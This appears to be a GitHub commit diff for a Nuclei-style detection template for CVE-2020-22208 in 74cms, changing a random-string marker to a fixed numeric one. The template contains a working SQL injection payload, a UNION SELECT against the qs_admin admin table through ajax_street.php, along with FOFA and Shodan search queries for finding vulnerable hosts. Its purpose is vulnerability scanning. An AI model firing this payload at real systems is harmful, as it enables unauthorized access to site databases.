Update CVE-2020-22208.yaml

patch-1
Ritik Chaddha 2022-06-30 08:19:29 +05:30 committed by GitHub
parent 8ab77083cc
commit 231601b9d3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 2 deletions

View File

@ -18,16 +18,19 @@ info:
fofa-query: app="74cms"
shodan-query: http.html:"74cms"
tags: cve,cve2020,74cms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- '{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11<31>%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5("{{randstr}}"),9%20from%20qs_admin#'
- '{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11<31>%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#'
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'
# Enhanced by cs on 2022/06/21